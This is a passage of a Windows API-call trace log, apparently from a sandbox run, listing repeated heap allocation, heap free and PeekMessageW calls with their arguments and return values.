returned 0 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.524] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.524] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.524] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.524] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.525] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.525] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.525] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.525] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.525] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.525] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.525] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.525] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.525] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.525] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.526] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.526] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.526] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.526] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.526] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.526] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.526] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.526] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.526] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.526] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.527] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.527] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d5e0 | out: hHeap=0xbe0000) returned 1 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0246.528] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0246.528] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e190 | out: hHeap=0xbe0000) returned 1 [0246.528] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21968 | out: hHeap=0xbe0000) returned 1 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.528] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.529] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc5d620 | out: hHeap=0xbe0000) returned 1 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.530] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.531] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.532] PeekMessageW (in: lpMsg=0x8bf4d4, 